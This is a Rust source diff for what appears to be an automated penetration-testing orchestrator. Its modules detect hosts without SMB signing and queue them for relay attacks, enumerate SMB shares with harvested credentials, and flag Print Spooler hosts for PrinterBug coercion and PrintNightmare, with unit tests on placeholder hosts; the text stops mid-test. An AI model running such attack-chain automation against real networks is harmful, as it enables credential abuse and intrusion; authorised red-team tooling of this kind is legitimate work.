+pub async fn auto_smb_signing_detection( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("smb_signing_disabled") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_smb_signing_work(&state) + }; + + for item in work { + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("smb_signing_{}", item.ip.replace('.', "_")), + vuln_type: "smb_signing_disabled".to_string(), + target: item.ip.clone(), + discovered_by: "auto_smb_signing_detection".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.ip)); + d.insert("ip".to_string(), json!(item.ip)); + if !item.hostname.is_empty() { + d.insert("hostname".to_string(), json!(item.hostname)); + } + if !item.domain.is_empty() { + d.insert("domain".to_string(), json!(item.domain)); + } + d + }, + recommended_agent: "coercion".to_string(), + priority: dispatcher.effective_priority("smb_signing_disabled"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!(ip = %item.ip, hostname = %item.hostname, "SMB signing disabled — vulnerability queued for relay"); + } + Ok(false) => {} // already exists + Err(e) => { + warn!(err = %e, ip = %item.ip, "Failed to publish SMB signing vulnerability") + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os:
String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn vuln_id_format() { + let ip = "192.168.58.22"; + let vuln_id = format!("smb_signing_{}", ip.replace('.', "_")); + assert_eq!(vuln_id, "smb_signing_192_168_58_22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_dc_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_dc_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_empty_hostname_skipped() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "", false)); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_already_discovered_vuln_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + // Simulate existing vulnerability + state.discovered_vulnerabilities.insert( + "smb_signing_192_168_58_22".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: 
"smb_signing_192_168_58_22".into(), + vuln_type: "smb_signing_disabled".into(), + target: "192.168.58.22".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".into(), + priority: 5, + }, + ); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_hosts_mixed_dc_and_member() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.22")); + assert!(ips.contains(&"192.168.58.23")); + assert!(!ips.contains(&"192.168.58.10")); + } + + #[test] + fn collect_host_without_fqdn_gets_empty_domain() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "srv01", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_skips_vuln_keeps_clean() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local", false)); + // Only 192.168.58.22 has existing vuln + state.discovered_vulnerabilities.insert( + "smb_signing_192_168_58_22".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "smb_signing_192_168_58_22".into(), + vuln_type: "smb_signing_disabled".into(), + target: "192.168.58.22".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + 
recommended_agent: "coercion".into(), + priority: 5, + }, + ); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ip, "192.168.58.23"); + } +} diff --git a/ares-cli/src/orchestrator/automation/smbclient_enum.rs b/ares-cli/src/orchestrator/automation/smbclient_enum.rs new file mode 100644 index 00000000..3379d0dc --- /dev/null +++ b/ares-cli/src/orchestrator/automation/smbclient_enum.rs @@ -0,0 +1,745 @@ +//! auto_smbclient_enum -- authenticated SMB share listing per domain. +//! +//! Complements auto_share_enumeration by using authenticated sessions to +//! discover shares that require credentials. Uses smbclient or netexec +//! to list shares on all known hosts. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SMB enumeration work items from current state. +/// +/// Pure logic extracted from the async loop so it can be unit-tested +/// without a Dispatcher or runtime. 
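The collect function below applies a two-step credential-preference rule: first a usable credential from the host's own domain, otherwise any usable credential. A minimal standalone sketch of that rule, assuming a simplified `Cred` type (the real code uses `ares_core::models::Credential` and also applies quarantine checks):

```rust
// Simplified stand-in for ares_core::models::Credential.
#[derive(Clone, Debug)]
struct Cred {
    username: String,
    password: String,
    domain: String,
}

/// Prefer a non-empty-password credential matching the host's domain,
/// falling back to any non-empty-password credential.
fn pick_credential<'a>(creds: &'a [Cred], host_domain: &str) -> Option<&'a Cred> {
    creds
        .iter()
        .find(|c| !c.password.is_empty() && c.domain.eq_ignore_ascii_case(host_domain))
        .or_else(|| creds.iter().find(|c| !c.password.is_empty()))
}

fn main() {
    let creds = vec![
        Cred { username: "fab_user".into(), password: "x".into(), domain: "fabrikam.local".into() },
        Cred { username: "con_user".into(), password: "y".into(), domain: "contoso.local".into() },
    ];
    // Same-domain credential wins when available.
    assert_eq!(pick_credential(&creds, "contoso.local").unwrap().username, "con_user");
    // Otherwise fall back to the first usable credential.
    assert_eq!(pick_credential(&creds[..1], "contoso.local").unwrap().username, "fab_user");
    println!("ok");
}
```

The fallback matters for cross-domain sweeps: a host whose domain has no harvested credential still gets enumerated with whatever credential is on hand.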
+fn collect_smbclient_work(state: &crate::orchestrator::state::StateInner) -> Vec<SmbEnumWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Check if host has SMB + let has_smb = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + if !has_smb { + continue; + } + + let dedup_key = format!("smb_auth_enum:{}", host.ip); + if state.is_processed(DEDUP_SMBCLIENT_ENUM, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_string()) + .unwrap_or_default(); + + // Pick a credential for this domain + let cred = match state + .credentials + .iter() + .find(|c| { + !domain.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(SmbEnumWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dispatches authenticated SMB share enumeration per host. +/// Interval: 45s. +pub async fn auto_smbclient_enum(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("smbclient_enum") { + continue; + } + + let work: Vec<SmbEnumWork> = { + let state = dispatcher.state.read().await; + let items = collect_smbclient_work(&state); + if items.is_empty() { + continue; + } + items + }; + + for item in work { + let payload = json!({ + "technique": "authenticated_share_enumeration", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("smbclient_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.target_ip, + "Authenticated SMB share enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SMBCLIENT_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SMBCLIENT_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.target_ip, "SMB auth enum deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.target_ip, "Failed to dispatch SMB auth enum"); + } + } + } + } +} + +struct SmbEnumWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::SharedState; + + /// Helper: create a credential for tests.
+ fn make_cred(user: &str, pass: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{user}"), + username: user.into(), + password: pass.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + /// Helper: create a host with given services. + fn make_host(ip: &str, hostname: &str, services: Vec<&str>) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: vec![], + services: services.into_iter().map(String::from).collect(), + is_dc: false, + owned: false, + } + } + + // ---- collect_smbclient_work tests ---- + + #[tokio::test] + async fn collect_empty_state_returns_nothing() { + let shared = SharedState::new("op-test".into()); + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_smb_hosts_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "web01.contoso.local", + vec!["80/tcp http", "443/tcp https"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_single_host_single_cred() { + let shared = 
SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.10"); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "smb_auth_enum:192.168.58.10"); + } + + #[tokio::test] + async fn collect_multiple_hosts() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb", "80/tcp http"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(ips.contains(&"192.168.58.20")); + } + + #[tokio::test] + async fn collect_dedup_skips_already_processed() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SMBCLIENT_ENUM, 
"smb_auth_enum:192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[tokio::test] + async fn collect_prefers_same_domain_credential() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_cred("con_user", "Con123!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "con_user"); + } + + #[tokio::test] + async fn collect_falls_back_to_any_credential_when_no_domain_match() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fab_user"); + } + + #[tokio::test] + async fn collect_skips_empty_password_credentials() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "", "contoso.local")); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn 
collect_skips_empty_password_falls_back() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "", "contoso.local")); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fab_user"); + } + + #[tokio::test] + async fn collect_bare_hostname_empty_domain() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state + .hosts + .push(make_host("192.168.58.10", "srv01", vec!["445/tcp smb"])); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_cifs_service_detected() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "nas01.contoso.local", + vec!["cifs file share"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_case_insensitive_domain_matching() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.CONTOSO.LOCAL", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", 
"contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "CONTOSO.LOCAL"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_mixed_smb_and_non_smb_hosts() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds", "88/tcp kerberos"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "web01.contoso.local", + vec!["80/tcp http", "443/tcp https"], + )); + state.hosts.push(make_host( + "192.168.58.30", + "sql01.contoso.local", + vec!["1433/tcp mssql", "445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(!ips.contains(&"192.168.58.20")); + assert!(ips.contains(&"192.168.58.30")); + } + + #[tokio::test] + async fn collect_all_deduped_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into()); + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.20".into()); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + 
#[tokio::test] + async fn collect_cross_domain_hosts_get_correct_creds() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "dc02.fabrikam.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("con_admin", "ConPass!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_cred("fab_admin", "FabPass!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + + let contoso_work = work + .iter() + .find(|w| w.target_ip == "192.168.58.10") + .unwrap(); + assert_eq!(contoso_work.credential.username, "con_admin"); + + let fabrikam_work = work + .iter() + .find(|w| w.target_ip == "192.168.58.20") + .unwrap(); + assert_eq!(fabrikam_work.credential.username, "fab_admin"); + } + + #[tokio::test] + async fn collect_only_empty_password_creds_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("user1", "", "contoso.local")); + state + .credentials + .push(make_cred("user2", "", "fabrikam.local")); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_host_with_empty_services() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", vec![])); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = 
collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + // ---- original tests ---- + + #[test] + fn dedup_key_format() { + let key = format!("smb_auth_enum:{}", "192.168.58.10"); + assert_eq!(key, "smb_auth_enum:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SMBCLIENT_ENUM, "smbclient_enum"); + } + + #[test] + fn smb_service_detection() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "80/tcp http".to_string(), + ]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn smb_service_detection_by_name() { + let services = ["microsoft-ds smb".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn no_smb_service() { + let services = [ + "3389/tcp ms-wbt-server".to_string(), + "80/tcp http".to_string(), + ]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(!has_smb); + } + + #[test] + fn domain_from_hostname_preserves_case() { + // smbclient_enum uses to_string() not to_lowercase() for domain + let hostname = "srv01.CONTOSO.LOCAL"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default(); + assert_eq!(domain, "CONTOSO.LOCAL"); + } + + #[test] + fn smb_service_detection_cifs() { + let services = ["cifs share".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn 
smb_enum_payload_structure() {
+        let payload = serde_json::json!({
+            "technique": "authenticated_share_enumeration",
+            "target_ip": "192.168.58.22",
+            "hostname": "srv01.contoso.local",
+            "domain": "contoso.local",
+            "credential": {
+                "username": "admin",
+                "password": "P@ssw0rd!",
+                "domain": "contoso.local",
+            },
+        });
+        assert_eq!(payload["technique"], "authenticated_share_enumeration");
+        assert_eq!(payload["target_ip"], "192.168.58.22");
+        assert_eq!(payload["credential"]["username"], "admin");
+    }
+
+    #[test]
+    fn credential_domain_matching_case_insensitive() {
+        let domain = "contoso.local";
+        let cred_domain = "CONTOSO.LOCAL";
+        assert_eq!(cred_domain.to_lowercase(), domain.to_lowercase());
+    }
+
+    #[test]
+    fn credential_domain_matching_empty_skips() {
+        let domain = "".to_string();
+        let cred_domain = "contoso.local";
+        let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+        assert!(!matches);
+    }
+
+    #[test]
+    fn smb_enum_work_construction() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+        let work = SmbEnumWork {
+            dedup_key: "smb_auth_enum:192.168.58.22".into(),
+            target_ip: "192.168.58.22".into(),
+            hostname: "srv01.contoso.local".into(),
+            domain: "contoso.local".into(),
+            credential: cred,
+        };
+        assert_eq!(work.target_ip, "192.168.58.22");
+        assert_eq!(work.credential.username, "admin");
+    }
+
+    #[test]
+    fn empty_services_no_smb() {
+        let services: Vec<String> = vec![];
+        let has_smb = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        assert!(!has_smb);
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/spooler_check.rs b/ares-cli/src/orchestrator/automation/spooler_check.rs
new file mode
100644 index 00000000..4815cfb2
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/spooler_check.rs
@@ -0,0 +1,376 @@
+//! auto_spooler_check -- detect Print Spooler service on discovered hosts.
+//!
+//! The Print Spooler service (MS-RPRN) is a common coercion vector: if running,
+//! PrinterBug (SpoolSample) can force the machine to authenticate to an attacker
+//! listener. It's also a prerequisite for PrintNightmare (CVE-2021-1675).
+//!
+//! This is a recon bridge: it dispatches a check per host and registers
+//! `spooler_enabled` vulnerabilities that downstream coercion/CVE modules target.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_spooler_work(state: &StateInner) -> Vec<SpoolerWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for host in &state.hosts {
+        let dedup_key = format!("spooler:{}", host.ip);
+        if state.is_processed(DEDUP_SPOOLER_CHECK, &dedup_key) {
+            continue;
+        }
+
+        let domain = host
+            .hostname
+            .find('.')
+            .map(|i| host.hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+            .or_else(|| state.credentials.first())
+            .cloned();
+
+        let cred = match cred {
+            Some(c) => c,
+            None => continue,
+        };
+
+        items.push(SpoolerWork {
+            dedup_key,
+            target_ip: host.ip.clone(),
+            hostname: host.hostname.clone(),
+            domain,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Checks discovered hosts for Print Spooler service availability.
+/// Interval: 45s.
+pub async fn auto_spooler_check(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("spooler_check") {
+            continue;
+        }
+
+        let work: Vec<SpoolerWork> = {
+            let state = dispatcher.state.read().await;
+            collect_spooler_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "spooler_check",
+                "target_ip": item.target_ip,
+                "hostname": item.hostname,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("spooler_check");
+            match dispatcher
+                .throttled_submit("recon", "recon", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        target = %item.target_ip,
+                        hostname = %item.hostname,
+                        "Print Spooler check dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_SPOOLER_CHECK, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_SPOOLER_CHECK, &item.dedup_key)
+                        .await;
+
+                    // Register spooler_enabled vulnerability proactively so it
+                    // appears in reports. The agent's report_finding callback
+                    // only logs — this ensures the finding is durable.
+ let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("spooler_{}", item.target_ip.replace('.', "_")), + vuln_type: "spooler_enabled".to_string(), + target: item.target_ip.clone(), + discovered_by: "auto_spooler_check".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.target_ip)); + d.insert("hostname".to_string(), json!(item.hostname)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert( + "description".to_string(), + json!("Print Spooler service (MS-RPRN) is running. Enables PrinterBug coercion and is a prerequisite for PrintNightmare (CVE-2021-1675)."), + ); + d + }, + recommended_agent: "privesc".to_string(), + priority: dispatcher.effective_priority("spooler_check"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + target = %item.target_ip, + hostname = %item.hostname, + "Print Spooler enabled — vulnerability registered" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to publish spooler vulnerability"); + } + } + } + Ok(None) => { + debug!(target = %item.target_ip, "Spooler check deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch spooler check"); + } + } + } + } +} + +struct SpoolerWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + 